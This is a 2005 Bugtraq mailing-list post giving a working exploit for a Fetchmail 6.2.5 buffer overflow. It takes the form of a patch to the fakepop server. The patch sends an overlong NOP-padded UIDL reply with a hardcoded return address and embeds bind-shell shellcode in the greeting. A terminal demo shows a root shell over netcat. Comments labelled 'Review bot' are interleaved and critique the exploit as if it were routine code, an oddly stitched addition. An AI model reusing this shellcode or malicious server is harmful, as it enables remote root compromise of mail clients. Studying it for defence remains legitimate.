List: bugtraq
Subject: Fetchmail 6.2.5 exploit for Bugtraq ID: 14349
From: bannedit () frontiernet ! net
Date: 2005-08-30 16:02:03
Message-ID: 20050830160203.28469.qmail () securityfocus ! com
The following exploit is brought to you by The Mantis Project, which is a project geared towards learning the process of discovering and exploiting bugs in the wild. Exploits are based on published advisories which do not contain proof of concept code or unpublished findings. The project's purpose is to get a better understanding of wild bugs and the process of exploiting them while providing a resource to the community, particularly penetration testers. So if you are interested in exploit development or just want to learn more about it, feel free to join us on irc.pulltheplug.org #mantis or the mailing list at http://pulltheplug.org/cgi-bin/mailman/listinfo/mantis.

Special thanks to PullThePlug for hosting the project.
-------------------[exploit]-------------------
This patch is for fakepop version 7. fakepop is a fake pop3 server which is normally used to inform users of misconfigured clients.

Note: fakepop is run by inetd
example:
<---+in terminal 1+--->
farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl 1 localhost
fetchmail: removing stale lockfile
Enter password for root@localhost:
UIDL 2
<---+in terminal 2+--->
farenhiet:/home/bannedit/exploit# perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc localhost 20000 id
uid=0(root) gid=0(root) groups=0(root)
<----+patch for fakepop-7+--->
--- fakepop-7/fakepop.c 2004-12-01 12:13:02.000000000 -0500
+++ fakepop.c 2005-08-29 18:45:01.096792176 -0400
@@ -29,7 +29,12 @@
if (strcasecmp ("stat", cmd) == 0) {
known = 1;
- printf("+OK %d %d\r\n", msg_gettotalmsgs(), msg_gettotalsize());
+ printf("+OK 8 %d\r\n", msg_gettotalsize());
+ }
+
+ if(strcasecmp("last", cmd) == 0){
+ known = 1;
+ printf("-ERR 1\r\n");
}
if (strncasecmp ("list", cmd, 4) == 0) {
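Review bot: the STAT reply now hardcodes a message count of 8 while still reporting msg_gettotalsize(), so the count no longer agrees with msg_gettotalmsgs() or with what the LIST handler below will enumerate; a server whose STAT count contradicts its own listing, together with the bare `-ERR 1` answer to LAST, is exactly the inconsistent behaviour a client sanity check or an IDS fingerprint would flag. If the constant must stay, name it and add a comment explaining why it differs from msg_gettotalmsgs().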
@@ -56,25 +61,17 @@
}
if (strncasecmp ("uidl", cmd, 4) == 0) {
- char s[71];
- int i;
- known = 1;
- if (strlen(cmd) > 5) {
- /* single message uidl */
- i = atoi(cmd+5);
- id_get_uidl (i, s);
- printf("+OK %d %s\r\n",i,s);
- } else {
- /* all messages uidl */
- int j;
- j = msg_gettotalmsgs();
- printf("+OK\r\n");
- for (i = 1; i <= j; i++) {
- id_get_uidl (i, s);
- printf("%d %s\r\n",i,s);
- }
- printf(".\r\n");
- }
+ known=1;
+
+ char s[177]; //177
+ long addy=0xbfffd702;
+ int i=atoi(cmd+5);
+
+ memset(s, 0x90, sizeof(s));
+ *(long*)&s[sizeof(s)-5]=addy;
+ s[sizeof(s)-1]='\0';
+
+ printf("+OK %d %s\r\n",i+1,s);
}
if (strncasecmp ("retr", cmd, 4) == 0) {
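Review bot: the `strlen(cmd) > 5` guard from the removed code is gone, so `atoi(cmd+5)` is evaluated for a bare `UIDL` as well and reads past the end of the short command string; keep the guard (or handle the no-argument form) before indexing `cmd+5`. Two smaller points: `*(long*)&s[sizeof(s)-5]=addy;` is an unaligned type-punning store that should be a memcpy, and declaring `char s[177];` after the `known=1;` statement needs C99 mixed declarations, so the file may no longer build under the stricter flags the original layout suggests (the `//177` comment is also noise). What the hunk does show for defenders is that the 71-byte `s` in the original server was the only thing bounding the length of a UIDL reply; a client must bound what it copies from a UIDL line on its own side rather than trust the server to stay short.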
@@ -122,8 +119,21 @@
msg_init();
- printf ("+OK fakepop V%s %s <1234.5678901234@fakepop.invalid>\r\n",
- PROGRAM_VERSION, URL);
+ char sc[]=
+ "\x31\xdb\x31\xc9\xf7\xe3"
+ "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b"
+ "\xcd\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1"
+ "\xb0\xef\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0"
+ "\x66\x43\x43\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd"
+ "\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51"
+ "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53"
+ "\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80";
+
+char buff[strlen(sc)+100];
+memset(buff, 0x90, sizeof(buff));
+memcpy(&buff[sizeof(buff)-strlen(sc)], sc, strlen(sc));
+ printf ("+OK fakepop V%s %s %s <1234.5678901234@fakepop.invalid>\r\n",
+ PROGRAM_VERSION, URL, sc);
fflush(stdout);
while ((running == 1) && (fgets(cmd, CMD_MAX_SIZE, stdin) != NULL)) {
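Review bot: `buff` is dead code: it is filled with 0x90 and `sc` is copied into its tail, but the printf two lines later sends `sc`, not `buff`, so the three `buff` lines (including the VLA `char buff[strlen(sc)+100];`) should either be used or dropped. Those lines are also not indented to match the surrounding block, and `char sc[]` is declared mid-block after `msg_init();`, the same C99 dependency as the UIDL hunk. Separately, the greeting now embeds raw non-printable bytes in a line that RFC 1939 expects to be printable ASCII, which is a trivial thing for a hardened mail client or a network monitor to reject or alert on.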